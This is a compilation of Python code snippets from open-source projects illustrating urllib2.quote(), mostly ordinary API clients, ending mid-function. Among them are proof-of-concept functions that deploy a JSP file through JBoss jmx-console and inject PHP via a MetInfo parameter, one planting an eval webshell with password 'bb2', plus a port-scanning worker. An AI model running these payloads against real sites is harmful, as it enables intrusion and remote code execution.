我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用urllib2.quote()。
def retrieve_json(self,url):
    '''
    Retrieve data from the Veneer service at the given url path.

    url: Path to required resource, relative to the root of the Veneer service.

    When ``self.protocol`` is ``'file'`` the document is read from
    ``self.prefix + url + self.data_ext`` on disk; otherwise it is fetched with
    an HTTP GET from ``self.host`` / ``self.port``.

    Returns the parsed JSON document.
    '''
    if PRINT_URLS:
        print("*** %s ***" % (url))

    if self.protocol=='file':
        # Context manager so the handle is released even if read() fails.
        with open(self.prefix+url+self.data_ext) as source:
            text = source.read()
    else:
        conn = hc.HTTPConnection(self.host,port=self.port)
        try:
            conn.request('GET',quote(url+self.data_ext))
            resp = conn.getresponse()
            text = resp.read().decode('utf-8')
        finally:
            # Always release the socket, including on request/decode errors.
            conn.close()

    text = self._replace_inf(text)

    # Parse once and reuse the result for both the debug dump and the return.
    data = json.loads(text)
    if PRINT_ALL:
        print(data)
        print("")
    return data
def retrieve_csv(self,url):
    '''
    Fetch a resource from the Veneer service in CSV format and parse it.

    url: Path to required resource, relative to the root of the Veneer service.

    Returns whatever ``utils.read_veneer_csv`` produces for the response text.

    NOTE: CSV responses are currently only available for time series results
    '''
    if PRINT_URLS:
        print("*** %s ***" % (url))

    # CSV is requested explicitly through the Accept header.
    target = self.base_url + quote(url+self.data_ext)
    csv_request = Request(target,headers={"Accept":"text/csv"})
    payload = urlopen(csv_request).read()
    result = utils.read_veneer_csv(payload.decode('utf-8'))

    if PRINT_ALL:
        print(result)
        print("")
    return result
def retrieve_json(self,url,**kwargs):
    '''
    Fetch ``self.base_url + quote(url)``, save the raw text and return the
    parsed JSON.

    url: Path of the resource; ``url[1:]`` is used as the name passed to
         ``self.save_data``.

    Returns the parsed JSON document, or None when the download fails (the
    failure is reported through ``self.log``).
    '''
    if self.print_urls:
        print("*** %s ***" % (url))

    try:
        text = urlopen(self.base_url + quote(url)).read().decode('utf-8')
    except Exception:
        # Best-effort download: report and carry on, but let
        # KeyboardInterrupt / SystemExit propagate.
        self.log("Couldn't retrieve %s"%url)
        return None

    self.save_data(url[1:],bytes(text,'utf-8'),"json")

    # Parse once and reuse for both the debug dump and the return value.
    data = json.loads(text)
    if self.print_all:
        print(data)
        print("")
    return data
def get_user(self):
    """
    Look up the current user's profile with the Google OAuth2 userinfo endpoint.

    Returns a dict with ``first_name``, ``last_name``, ``username`` and
    ``email`` taken from the userinfo response, or None when there is no
    access token or the request fails (in which case ``session.token`` is
    reset to None).
    """
    token = self.accessToken()
    if not token:
        return None

    uinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo?access_token=%s' % urllib2.quote(token, safe='')

    try:
        uinfo_stream = urllib2.urlopen(uinfo_url)
    except Exception:
        # Request failed: drop the stored token, but do not swallow
        # KeyboardInterrupt / SystemExit.
        session.token = None
        return None

    try:
        data = uinfo_stream.read()
    finally:
        uinfo_stream.close()

    uinfo = json.loads(data)
    username = uinfo['id']

    return dict(first_name = uinfo['given_name'],
                last_name = uinfo['family_name'],
                username = username,
                email = uinfo['email'])
def cui_to_uri(api_key, cui):
    """
    Map a CUI to a URI, if possible, using the BioOntology portal search API.
    Input:
        - api_key: str,
        API usage key; change it in setting.yaml
        - cui: str,
        CUI of the entity we wish to map to a URI
    Output:
        - the URI found, as a string, or None
    """

    REST_URL = "http://data.bioontology.org"
    annotations = get_json_with_api(api_key, REST_URL + "/search?include_properties=true&q=" + urllib2.quote(cui))
    try:
        # The first hit of the search result carries the URI under '@id'.
        return annotations['collection'][0]['@id']
    except Exception as e:
        # Any failure to dig the id out of the response is logged and
        # reported to the caller as "not found".
        time_log(Exception)
        time_log(e)
        return None
def cui_to_uri(api_key, cui):
    """
    Map a CUI to a URI, if possible, using the BioOntology portal search API.
    Input:
        - api_key: str,
        API usage key; change it in setting.yaml
        - cui: str,
        CUI of the entity we wish to map to a URI
    Output:
        - the URI found, as a string, or None
    """

    REST_URL = "http://data.bioontology.org"
    annotations = get_json_with_api(api_key, REST_URL + "/search?include_properties=true&q=" + urllib2.quote(cui))
    try:
        # The first hit of the search result carries the URI under '@id'.
        return annotations['collection'][0]['@id']
    except Exception as e:
        # Any failure to dig the id out of the response is printed and
        # reported to the caller as "not found".
        print(Exception)
        print(e)
        return None
def edsm_worker(systemName):
    """
    Fetch the bodies of `systemName` from EDSM and store them in this.edsm_data.

    On success this.edsm_data holds the decoded JSON (or {} when the response
    is empty); on any request/decoding failure it is set to None. In both
    cases a '<<HabZoneData>>' event is generated on this.frame afterwards.
    """

    # Lazily create one shared session.
    if not this.edsm_session:
        this.edsm_session = requests.Session()

    try:
        r = this.edsm_session.get('https://www.edsm.net/api-system-v1/bodies?systemName=%s' % urllib2.quote(systemName), timeout=10)
        r.raise_for_status()
        this.edsm_data = r.json() or {}	# Unknown system represented as empty list
    except Exception:
        # Best-effort lookup: None signals the error to the event handler.
        this.edsm_data = None

    # Tk is not thread-safe, so can't access widgets in this thread.
    # event_generate() is the only safe way to poke the main thread from this thread.
    this.frame.event_generate('<<HabZoneData>>', when='tail')


# EDSM data received
def edsm_data(event):
    """
    Update the per-world EDSM link widgets from this.edsm_data.

    When this.edsm_data is None every widget shows '?' with no URL. Otherwise
    bodies are grouped by sub-type (terraforming candidates under
    'terraformable') and each entry of WORLDS gets the matching body names as
    text plus a link to EDSM.
    """

    if this.edsm_data is None:
        # error
        for (label, edsm, near, dash, far, ls) in this.worlds:
            edsm['text'] = '?'
            edsm['url'] = None
        return

    # Collate
    bodies = defaultdict(list)
    for body in this.edsm_data.get('bodies', []):
        if body.get('terraformingState') == 'Candidate for terraforming':
            group = 'terraformable'
        else:
            group = body['subType']
        bodies[group].append(body['name'])

    # Display
    systemName = this.edsm_data.get('name', '')
    url = 'https://www.edsm.net/show-system?systemName=%s&bodyName=ALL' % urllib2.quote(systemName)
    prefix_len = len(systemName)
    for idx, (name, high, low, subType) in enumerate(WORLDS):
        (label, edsm, near, dash, far, ls) = this.worlds[idx]

        # Drop the system-name prefix (and inner spaces) from body names.
        shown = []
        for body_name in bodies[subType]:
            if body_name.startswith(systemName):
                shown.append(body_name[prefix_len:].replace(' ', ''))
            else:
                shown.append(body_name)
        edsm['text'] = ' '.join(shown)

        # A single match links straight to that body, otherwise to the system.
        if len(bodies[subType]) == 1:
            edsm['url'] = 'https://www.edsm.net/show-system?systemName=%s&bodyName=%s' % (urllib2.quote(systemName), urllib2.quote(bodies[subType][0]))
        else:
            edsm['url'] = url
def encode_params(self, base_url, method, params):
    """
    Return `params` plus the OAuth 1.0 fields as a signed, encoded string.

    A copy of `params` is extended with the oauth_* fields (token only when
    self.token is set), encoded with urlencode_noplus in sorted order, signed
    with HMAC-SHA1 and returned with "&oauth_signature=..." appended.
    """
    def percent_encode(value):
        # Everything except unreserved characters and '~' is escaped.
        return urllib_parse.quote(value, safe='~')

    signed = params.copy()
    if self.token:
        signed['oauth_token'] = self.token
    signed['oauth_consumer_key'] = self.consumer_key
    signed['oauth_signature_method'] = 'HMAC-SHA1'
    signed['oauth_version'] = '1.0'
    signed['oauth_timestamp'] = str(int(time()))
    signed['oauth_nonce'] = str(getrandbits(64))

    enc_params = urlencode_noplus(sorted(signed.items()))

    # Signing key: consumer secret and token secret joined by '&'.
    key = self.consumer_secret + "&" + percent_encode(self.token_secret)

    # Signature base string: METHOD & url & encoded parameters.
    base_parts = [method.upper(), base_url, enc_params]
    message = '&'.join(map(percent_encode, base_parts))

    digest = hmac.new(
        key.encode('ascii'), message.encode('ascii'), hashlib.sha1).digest()
    signature = base64.b64encode(digest)
    return enc_params + "&" + "oauth_signature=" + percent_encode(signature)
def __call__(self, twitter, options):
    """
    Run a search for options['extra_args'] and print each formatted result.

    Results whose formatted text is blank are skipped.
    """
    # We need to be pointing at search.twitter.com to work, and it is less
    # tangly to do it here than in the main()
    twitter.domain = "search.twitter.com"
    twitter.uriparts = ()

    # We need to bypass the TwitterCall parameter encoding, so we
    # don't encode the plus sign, so we have to encode it ourselves
    encoded_terms = [quote(term) for term in options['extra_args']]
    query_string = "+".join(encoded_terms)

    results = twitter.search(q=query_string)['results']
    formatter = get_formatter('search', options)
    for entry in results:
        rendered = formatter(entry, options)
        if not rendered.strip():
            continue
        printNicely(rendered)
def get_user(self):
    """
    Look up the current user's profile with the Google OAuth2 userinfo endpoint.

    Returns a dict with ``first_name``, ``last_name``, ``username``, ``email``
    and ``pic``, or None when there is no access token or the request fails
    (in which case ``session.token`` is reset to None).
    """
    token = self.accessToken()
    if not token:
        return None

    uinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo?access_token=%s' % urllib2.quote(token, safe='')

    try:
        uinfo_stream = urllib2.urlopen(uinfo_url)
    except Exception:
        # Request failed: drop the stored token, but do not swallow
        # KeyboardInterrupt / SystemExit.
        session.token = None
        return None

    try:
        data = uinfo_stream.read()
    finally:
        uinfo_stream.close()

    # NOTE(review): this literal contains the text "uinfo['id']" verbatim, so
    # the user id is never interpolated into the URL. It looks unfinished;
    # left untouched because the intended URL format cannot be confirmed here.
    pic = "http://picasaweb.google.com/data/entry/api/user/ uinfo['id'] ?alt=json"
    uinfo = json.loads(data)
    return dict(first_name=uinfo['given_name'],
                last_name=uinfo['family_name'],
                username=uinfo['id'],
                email=uinfo['email'],
                pic=pic)
def downloadSingleType(bigCate,smallCate,baseDir):
    """
    Queue the listing page of one category pair and prepare its directory.

    The listing URL is built from `bigCate` / `smallCate` (as the sort1 /
    sort2 query parameters) and put on the global `queue`; the globals
    `smallCateURL`, `downloadDir` and `logFile` are updated as a side effect.

    :param bigCate: value used for sort1 and as the first sub-directory name
    :param smallCate: value used for sort2 and as the second sub-directory name
    :param baseDir: base directory; must not end with '/'
    :return: None
    """
    global smallCateURL, downloadDir, queue, logFile

    quoted_big = urllib2.quote(bigCate)
    quoted_small = urllib2.quote(smallCate)
    smallCateURL = 'http://dict.qq.pinyin.cn/dict_list?sort1=%s&sort2=%s' % (quoted_big, quoted_small)

    # A trailing slash on the base directory is rejected with a message.
    if baseDir[-1] == '/':
        print('?? '+baseDir+' ?????/')
        return

    downloadDir = baseDir+'/'+bigCate+'/'+smallCate
    logFile = baseDir+'/download.log'

    # Create the target directory on first use.
    if not os.path.exists(downloadDir.decode('utf8')):
        os.makedirs(downloadDir.decode('utf8'))

    queue.put(smallCateURL)
def wiki_bio_download (list_file_name, out_dir):
    """
    Download the English Wikipedia page of every name listed in a file.

    list_file_name: UTF-8 text file with one page name per line.
    out_dir: directory receiving "<name>.html" files; created when missing.

    Pages whose output file already exists are not downloaded again. Blank
    lines in the list are skipped.
    """
    # Context managers make sure the list, each response and each output file
    # are closed (and output flushed) even when a download fails.
    with codecs.open(list_file_name, 'r', "utf-8") as name_list:
        for name in name_list:
            # Strip both LF and CRLF endings; ignore empty lines, which would
            # otherwise fetch ".../wiki/" into a file called ".html".
            name=name.rstrip('\r\n')
            if not name:
                continue
            if not os.path.exists(out_dir):
                os.makedirs(out_dir)
            outname = out_dir+os.sep+name+".html"
            if os.path.exists(outname):
                continue

            url="https://en.wikipedia.org/wiki/"+name
            sys.stdout.write(" Downloading "+name.encode('utf8')+"\n")
            # Keep ':' and '/' so only the page name part is escaped.
            url = urllib2.quote(url.encode('utf8'), ':/')
            response = urllib2.urlopen(url)
            try:
                html = response.read().decode('utf8')
            finally:
                response.close()

            with codecs.open(outname, 'w', "utf-8") as html_out:
                html_out.write(html)
    sys.stdout.write("All files downloaded\n")
def upload_to(host, filename, port=7777):
    """
    Simple method to upload a file into NGAS

    host: NGAS server host name.
    filename: path of the local file; its base name is sent as the
              ``filename`` query parameter of the QARCHIVE request.
    port: NGAS server port.

    Raises Exception when the server does not answer with HTTP 200.
    """

    with contextlib.closing(httplib.HTTPConnection(host, port)) as conn:

        conn.putrequest('POST', '/QARCHIVE?filename=%s' % (urllib2.quote(os.path.basename(filename)),) )
        conn.putheader('Content-Length', os.stat(filename).st_size)
        conn.endheaders()

        # Binary mode: the bytes sent must match the Content-Length taken from
        # os.stat(), which text mode does not guarantee on every platform.
        with open(filename, 'rb') as f:
            for data in iter(functools.partial(f.read, 4096), b''):
                conn.send(data)

        r = conn.getresponse()
        if r.status != httplib.OK:
            raise Exception("Error while QARCHIVE-ing %s to %s:%d:\nStatus: %d\n%s\n\n%s" % (filename, conn.host, conn.port, r.status, r.msg, r.read()))
        else:
            success("{0} successfully archived to {1}!".format(filename, host))
def getPushURL(hostId, gateway = None):
    """
    Construct the push url based on the hostId in the cluster

    hostId:    the host (e.g. 192.168.1.1:7777) that will receive the file

    gateway:   a list of gateway hosts separated by comma
               The sequence of this list is from target to source
               e.g. if the dataflow is like:
               source --> A --> B --> C --> target
               then, the gateway list should be ordered as: C,B,A
               Whitespace around entries and empty entries are ignored.

    Returns the QARCHIVE url of hostId, wrapped once per gateway in a
    PARCHIVE url whose ``nexturl`` parameter is the quoted inner url.
    """
    gurl = 'http://%s/QARCHIVE' % hostId
    if not gateway:
        return gurl

    for gw in gateway.split(','):
        # "C, B" or a trailing comma must not yield hosts like " B" or "".
        gw = gw.strip()
        if not gw:
            continue
        gurl = 'http://%s/PARCHIVE?nexturl=%s' % (gw, urllib2.quote(gurl))
    return gurl
def getPushURL(hostId, gateway = None):
    """
    Construct the push url based on the hostId in the cluster

    hostId:    the host (e.g. 192.168.1.1:7777) that will receive the file

    gateway:   a list of gateway hosts separated by comma
               The sequence of this list is from target to source
               e.g. if the dataflow is like:
               source --> A --> B --> C --> target
               then, the gateway list should be ordered as: C,B,A
               Whitespace around entries and empty entries are ignored.

    Returns the QAPLUS url of hostId, wrapped once per gateway in a
    PARCHIVE url whose ``nexturl`` parameter is the quoted inner url.
    """
    gurl = 'http://%s/QAPLUS' % hostId
    if not gateway:
        return gurl

    for gw in gateway.split(','):
        # "C, B" or a trailing comma must not yield hosts like " B" or "".
        gw = gw.strip()
        if not gw:
            continue
        gurl = 'http://%s/PARCHIVE?nexturl=%s' % (gw, urllib2.quote(gurl))
    return gurl
def _get_proxy_info(context): if not context.get('proxy_hostname') or not context.get('proxy_port'): return None user_pass = '' if context.get('proxy_username') and context.get('proxy_password'): username = urllib2.quote(context['proxy_username'], safe='') password = urllib2.quote(context['proxy_password'], safe='') user_pass = '{user}:{password}@'.format( user=username, password=password) proxy = 'http://{user_pass}{host}:{port}'.format( user_pass=user_pass, host=context['proxy_hostname'], port=context['proxy_port']) proxies = { 'http': proxy, 'https': proxy, } return proxies
def query(self, query, num_results=30):
    """
    Collect image ids and urls for `query`, page by page.

    query: search text; passed through self.preprocess and URL-quoted.
    num_results: maximum number of entries returned.

    One page is fetched per self.max_number_per_req requested results, with a
    0.25 s pause after each page. Returns a list of
    {'image_id': ..., 'url': ...} dicts, at most num_results long.
    """
    query = urllib2.quote(self.preprocess(query))

    def page_url(page_no):
        # Fill the {query} / {page} placeholders of the base url.
        return self.base_url.replace("{query}", query).replace("{page}", str(page_no))

    all_images = []
    p = 0
    next_url = page_url(p)
    for _ in range(0, num_results, self.max_number_per_req):
        page = html.fromstring(self.opener.open(next_url).read())
        result_list = page.find_class('serp-list')[0]

        # Each child carries its metadata as JSON in the data-bem attribute.
        images = []
        for el in result_list.getchildren():
            images.append(json.loads(el.get('data-bem'))['serp-item'])
        all_images.extend(
            {'image_id': image['id'], 'url': image['img_href']} for image in images)

        p += 1
        next_url = page_url(p)
        time.sleep(0.25)

    return all_images[:num_results]
def run(self):
    """
    Worker loop: take "host:port" tasks from the queue and probe each one.

    For every task the port is scanned; a non-'NULL' banner is stored
    URL-quoted in port_data, the service type is determined (falling back to
    get_web_info) and, when known, logged. The loop ends when the queue is
    empty or fetching a task fails; errors while handling one task skip it.
    """
    while True:
        try:
            # NOTE(review): emptiness is checked on the module-level `queue`
            # while the task is taken from `self.queue` - confirm both refer
            # to the same object.
            if queue.empty():break
            queue_task = self.queue.get()
        except Exception:
            break
        try:
            task_host,task_port = queue_task.split(":")
            data = scan_port(task_host,task_port)
            if data:
                if data != 'NULL':
                    port_data[task_host + ":" + task_port] = urllib2.quote(data)
                server_type = server_discern(task_host,task_port,data)
                if not server_type:
                    # Unknown banner: try to identify it as a web server.
                    h_server,title = get_web_info(task_host,task_port)
                    if title or h_server:server_type = 'web ' + title
                if server_type:log('server',task_host,task_port,server_type.strip())
        except Exception:
            # Best effort: a failing task must not stop the worker.
            continue
def get_web_info(host,port):
    """
    Fetch http://host:port and return (headers as str, page title).

    The headers plus the HTML-escaped body are also stored URL-quoted in
    port_data["host:port"]. For an HTTP error response the error's headers
    are used with an empty body. Returns (False, False) when the request
    fails otherwise or no headers are available.
    """
    title_str,html = '',''
    try:
        info = urllib2.urlopen("http://%s:%s"%(host,port),timeout=timeout)
        try:
            html = info.read()
            header = info.headers
        finally:
            # Release the connection once the body has been read.
            info.close()
    except urllib2.HTTPError as e:
        header = e.headers
    except Exception:
        return False,False
    if not header:return False,False
    try:
        port_data[host + ":" + str(port)] = urllib2.quote(str(header) + "\r\n\r\n" + cgi.escape(html))
        title = re.search(r'<title>(.*)</title>', html, flags=re.I)
        if title:title_str=title.group(1)
    except Exception:
        # Best effort: recording/parsing problems leave the title empty.
        pass
    return str(header),title_str
def run(self):
    """
    Worker loop: take "host:port" tasks from the queue and probe each one.

    For every task the port is scanned; a non-'NULL' banner is stored
    URL-quoted in port_data, the service type is determined (falling back to
    get_web_info) and, when known, logged. The loop ends when the queue is
    empty or fetching a task fails; errors while handling one task skip it.
    """
    while True:
        try:
            # NOTE(review): emptiness is checked on the module-level `queue`
            # while the task is taken from `self.queue` - confirm both refer
            # to the same object.
            if queue.empty():break
            queue_task = self.queue.get()
        except Exception:
            break
        try:
            task_host,task_port = queue_task.split(":")
            data = scan_port(task_host,task_port)
            if data:
                if data != 'NULL':
                    port_data[task_host + ":" + task_port] = urllib2.quote(data)
                server_type = server_discern(task_host,task_port,data)
                if not server_type:
                    # Unknown banner: try to identify it as a web server.
                    h_server,title = get_web_info(task_host,task_port)
                    if title or h_server:server_type = 'web ' + title
                if server_type:log('server',task_host,task_port,server_type.strip())
        except Exception:
            # Best effort: a failing task must not stop the worker.
            continue
def get_web_info(host,port):
    """
    Fetch http://host:port and return (headers as str, page title).

    The body is re-encoded to UTF-8 when get_code() reports a short charset
    name. The headers plus the HTML-escaped body are stored URL-quoted in
    port_data["host:port"]. For an HTTP error response the error's headers
    are used with an empty body. Returns (False, False) when the request
    fails otherwise or no headers are available.
    """
    title_str,html = '',''
    try:
        info = urllib2.urlopen("http://%s:%s"%(host,port),timeout=timeout)
        try:
            html = info.read()
            header = info.headers
        finally:
            # Release the connection once the body has been read.
            info.close()
    except urllib2.HTTPError as e:
        header = e.headers
    except Exception:
        return False,False
    if not header:return False,False
    try:
        html_code = get_code(header,html).strip()
        if html_code and len(html_code) < 12:
            html = html.decode(html_code).encode('utf-8')
    except Exception:
        # Best effort: keep the body as received when re-encoding fails.
        pass
    try:
        port_data[host + ":" + str(port)] = urllib2.quote(str(header) + "\r\n\r\n" + cgi.escape(html))
        title = re.search(r'<title>(.*?)</title>', html, flags=re.I|re.M)
        if title:title_str=title.group(1)
    except Exception:
        # Best effort: recording/parsing problems leave the title empty.
        pass
    return str(header),title_str
def verify(cls, args): verify_code = ('\n<%@ page import="java.util.*,java.io.*" %>\n<%@ page import="' 'java.io.*"%>\n<%\nString path=request.getRealPath("");\nout.prin' 'tln(path);\nFile d=new File(path);\nif(d.exists()){\n d.delete()' ';\n }\n%>\n<% out.println("this_is_not_exist_9.1314923");%>') payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor' 'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True') verify_data = payload % urllib2.quote(verify_code) verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor' if args['options']['verbose']: print '[*] Request URL: ' + verify_url page_content = '' request = urllib2.Request(verify_url, verify_data) response = urllib2.urlopen(request) page_content = response.read() if 'this_is_not_exist_9.1314923' in page_content: args['success'] = True args['poc_ret']['vul_url'] = verify_url return args
def __str_quote(string):
    """
    Normalise `string`, apply the `rep` replacements and URL-quote the result.

    A `str` value is decoded from UTF-8 and a `unicode` value is encoded to
    UTF-8, each first with errors='xmlcharrefreplace' and then, if that
    raises, with errors='ignore'. Every match of the module-level `pattern`
    is replaced through the `rep` table before quoting with safe=''.
    If quoting raises KeyError, diagnostics are printed and the process exits.
    """
    kind = type(string).__name__
    if kind == "str":
        try:
            string = unicode(string, encoding='utf-8', errors='xmlcharrefreplace')
        except TypeError:
            string = unicode(string, encoding='utf-8', errors='ignore')
    elif kind == "unicode":
        try:
            string = string.encode(encoding='utf-8', errors='xmlcharrefreplace')
        except UnicodeEncodeError:
            string = string.encode(encoding='utf-8', errors='ignore')

    def _replacement(match):
        # `rep` is keyed by the regex-escaped form of the matched text.
        return rep[re.escape(match.group(0))]

    string = pattern.sub(_replacement, string)

    try:
        return quote(string, safe='')
    except KeyError:
        print("QUOTE FAIL")
        print(type(string).__name__)
        print(string)
        exit()
def updateUI(event = None):
    """
    Refresh the widgets from this.lastEventInfo.

    With a known system and the plugin enabled (or overwrite set), the system
    name, its EDSM link and the distance are shown, and the name is copied to
    the clipboard when that option is on. Otherwise the error label is shown
    with either the "disabled" text or the last message.
    """
    eliteSystem = this.lastEventInfo.get(BG_SYSTEM, None)
    message = this.lastEventInfo.get(BG_MESSAGE, None)
    active = this.enabled or this.overwrite.get()

    if not (active and eliteSystem):
        # Nothing to show: swap the system link for the error label.
        this.unconfirmedSystem.grid_remove()
        this.errorLabel.grid(row=0, column=1, sticky=tk.W)
        this.distanceValue["text"] = "?"
        if active:
            this.errorLabel["text"] = message or "?"
        else:
            this.errorLabel["text"] = "EDSM/EDDN is disabled"
        return

    this.errorLabel.grid_remove()
    this.unconfirmedSystem.grid(row=0, column=1, sticky=tk.W)
    this.unconfirmedSystem["text"] = eliteSystem.name
    this.unconfirmedSystem["url"] = "https://www.edsm.net/show-system?systemName={}".format(urllib2.quote(eliteSystem.name))
    this.unconfirmedSystem["state"] = "enabled"

    shown_distance = Locale.stringFromNumber(eliteSystem.distance, 2)
    shown_uncertainty = eliteSystem.getUncertainty() or "?"
    this.distanceValue["text"] = u"{distance} Ly (\u00B1{uncertainty})".format(distance=shown_distance, uncertainty=shown_uncertainty)

    if this.clipboard.get():
        this.frame.clipboard_clear()
        this.frame.clipboard_append(eliteSystem.name)
def run(self, lines):
    """
    Percent-encode the target of every "](#anchor)" link in `lines`.

    The anchor text is encoded to UTF-8 (ignoring unencodable characters)
    and URL-quoted. Returns a new list; lines without such a link are
    returned unchanged.
    """
    # Matches "](#...)" - may be more sensitive than strictly needed.
    anchor_link = re.compile(r'\]\(#([^\)]+)\)')

    def _quote_anchor(match):
        fragment = match.group(1).encode("utf-8", "ignore")
        return '](#%s)' % urllib2.quote(fragment)

    return [anchor_link.sub(_quote_anchor, line) for line in lines]
def verify(cls, args): url = args['options']['target'] payload = 'echo md5("beebeeto");//' name = os.urandom(3).encode('hex') shell_url = '%s/cache/langadmin_%s.php' % (url, name) verify_url = ( '%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m' 'et_langadmin[%s][]=12345&str=%s' % (url, name, name, urllib2.quote(payload)) ) if args['options']['verbose']: print '[*] Request URL: ' + verify_url requests.get(verify_url) if args['options']['verbose']: print '[*] Request SHELL: ' + verify_url content = requests.get(shell_url).content if '595bb9ce8726b4b55f538d3ca0ddfd76' in content: args['success'] = True args['poc_ret']['vul_url'] = verify_url args['poc_ret']['test_shell'] = shell_url return args
def exploit(cls, args): url = args['options']['target'] payload = 'echo md5("beebeeto");@eval($_POST["bb2"]);//' name = os.urandom(3).encode('hex') shell_url = '%s/cache/langadmin_%s.php' % (url, name) verify_url = ( '%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m' 'et_langadmin[%s][]=12345&str=%s' % (url, name, name, urllib2.quote(payload)) ) if args['options']['verbose']: print '[*] Request URL: ' + verify_url requests.get(verify_url) if args['options']['verbose']: print '[*] Request SHELL: ' + verify_url content = requests.get(shell_url).content if '595bb9ce8726b4b55f538d3ca0ddfd76' in content: args['success'] = True args['poc_ret']['vul_url'] = verify_url args['poc_ret']['webshell'] = shell_url args['poc_ret']['password'] = 'bb2' return args
def word_seg_get(data):
    """
    Request word segmentation for `data` and return the extracted buffers.

    `data` is UTF-8 encoded, URL-quoted and appended to `get_addres`. The
    response is transcoded from GBK to UTF-8 and parsed as JSON.

    Returns {} when the raw response does not mention 'SegmentResult';
    otherwise {"segment": [...], "basic": [...]} holding the 'buffer' values
    of the 'SegmentResult' and 'BasicWordResult' entries.
    """
    output = get_page(get_addres + urllib2.quote(data.encode("utf-8")))
    if 'SegmentResult' not in output:
        return {}

    output = output.decode("gbk").encode("utf-8")
    info_dict = json.loads(output)

    def _buffers(key):
        # Entries that are empty or carry no 'buffer' are skipped.
        if key not in info_dict:
            return []
        return [entry['buffer'] for entry in info_dict[key]
                if entry and 'buffer' in entry]

    result = {}
    result["segment"] = _buffers('SegmentResult')
    result["basic"] = _buffers('BasicWordResult')
    return result
def word_seg_get(data):
    """
    Request word segmentation for `data` and return the extracted buffers.

    `data` is UTF-8 encoded, URL-quoted and appended to `get_addres`. The
    response is transcoded from GBK to UTF-8, its newlines are replaced by
    spaces, and it is parsed as JSON.

    Returns {} when the raw response does not mention 'SegmentResult';
    otherwise {"segment": [...], "basic": [...]} holding the 'buffer' values
    of the 'SegmentResult' and 'BasicWordResult' entries.
    """
    output = get_page(get_addres + urllib2.quote(data.encode("utf-8")))
    if 'SegmentResult' not in output:
        return {}

    output = output.decode("gbk").encode("utf-8")
    newline_to_space = string.maketrans('\n',' ')
    output = output.translate(newline_to_space)
    info_dict = json.loads(output)

    def _buffers(key):
        # Entries that are empty or carry no 'buffer' are skipped.
        if key not in info_dict:
            return []
        return [entry['buffer'] for entry in info_dict[key]
                if entry and 'buffer' in entry]

    result = {}
    result["segment"] = _buffers('SegmentResult')
    result["basic"] = _buffers('BasicWordResult')
    return result
def getComputerId(computerSearch, username, password):
    """
    Look up the id of the single computer matching `computerSearch`.

    Returns the id text when exactly one computer matches, -1 when the API
    request fails or nothing matches, and -2 when several computers match.
    """
    reqStr = jss_api_base_url + '/computers/match/' + urllib2.quote(computerSearch)

    r = sendAPIRequest(reqStr, username, password, 'GET')
    if r == -1:
        return -1

    responseXml = etree.fromstring(r.read())
    match_count = responseXml.find('size').text

    if match_count == '1':
        return responseXml.find('computer/id').text
    if match_count == '0':
        # Nothing found.
        return -1
    # Too many results; the search needs narrowing.
    return -2
def getMobileDeviceId(mobileDeviceName, username, password):
    """
    Look up the id of the single mobile device matching `mobileDeviceName`.

    Returns the id text when exactly one device matches, -1 when the API
    request fails or nothing matches, and -2 when several devices match.
    """
    reqStr = jss_api_base_url + '/mobiledevices/match/' + urllib2.quote(mobileDeviceName)

    r = sendAPIRequest(reqStr, username, password, 'GET')
    if r == -1:
        return -1

    responseXml = etree.fromstring(r.read())
    match_count = responseXml.find('size').text

    if match_count == '1':
        return responseXml.find('mobile_device/id').text
    if match_count == '0':
        # Nothing found.
        return -1
    # Too many results; the search needs narrowing.
    return -2
def updateMobileDeviceName(mobileSearch, deviceName, username, password):
    """
    Prepare a DeviceName command for the supervised device matching
    `mobileSearch`.

    Returns -1 (after printing a message) when the device is not found or the
    search is ambiguous. Otherwise the command URL and XML body are built.

    NOTE(review): the visible code stops after building the request (nothing
    is sent) and the "not supervised" case falls through without returning -
    the snippet looks truncated; confirm against the full source.
    """
    print('Updating Mobile Device name for mobile device ' + mobileSearch + ' to ' + deviceName + '...')
    newDeviceName_normalized = urllib2.quote(deviceName)

    mobile_id = getSupervisedMobileDeviceId(mobileSearch, username, password)
    lookup_status = str(mobile_id)
    if lookup_status == '-1':
        print('Mobile device ' + mobileSearch + ' not found, please try again.')
        return -1
    elif lookup_status == '-2':
        print('More than one mobile device matching search string ' + str(mobileSearch) + ', please try again.')
        return -1
    elif lookup_status == '-3':
        print('Device found, but is not supervised.')

    postStr = jss_api_base_url + '/mobiledevicecommands/command/DeviceName/' + newDeviceName_normalized + '/id/' + mobile_id
    postXML = ("<mobile_device_command><command>DeviceName</command><mobile_devices><mobile_device><id>"
               + mobile_id
               + "</id><device_name>"
               + deviceName
               + "</device_name></mobile_device></mobile_devices></mobile_device_command>")
def getComputerGroupId(groupSearch, username, password):
    """
    Look up the id of the computer group named `groupSearch`.

    Returns the text of the response's 'id' element, or -1 when the API
    request fails.
    """
    reqStr = jss_api_base_url + '/computergroups/name/' + urllib2.quote(groupSearch)

    r = sendAPIRequest(reqStr, username, password, 'GET')
    if r == -1:
        # Group not found / request failed.
        return -1

    responseXml = etree.fromstring(r.read())
    return responseXml.find('id').text
def rawGeocoder(self, query):
    """
    Geocode `query` (with ", Argentina" appended) via the Google geocoder.

    Returns one dict per result with the keys 'nombre' (formatted address),
    'precision' (number of address components divided by 6), 'geom'
    ("POINT(lng lat)") and 'tipo' ("rawGeocoder").
    """
    # http://stackoverflow.com/questions/9884475/using-google-maps-geocoder-from-python-with-urllib2
    address = urllib2.quote((query + ", Argentina").encode('utf8'))
    geocode_url = "http://maps.googleapis.com/maps/api/geocode/json?language=es&address=%s&sensor=false" % address
    res = json.loads(urllib2.urlopen(geocode_url).read())

    # Convert each geocoder result into the structure used by callers.
    ret = []
    for hit in res["results"]:
        nombre = hit["formatted_address"]
        precision = len(hit["address_components"]) / 6
        geom = "POINT(" + str(hit["geometry"]["location"]["lng"]) + " " + str(hit["geometry"]["location"]["lat"]) + ")"
        ret.append({
            'nombre' : nombre,
            'precision': precision,
            'geom' : geom,
            'tipo' : "rawGeocoder"
        })
    return ret
def direccionPostal(self, calle, numero, ciudad_slug):
    """
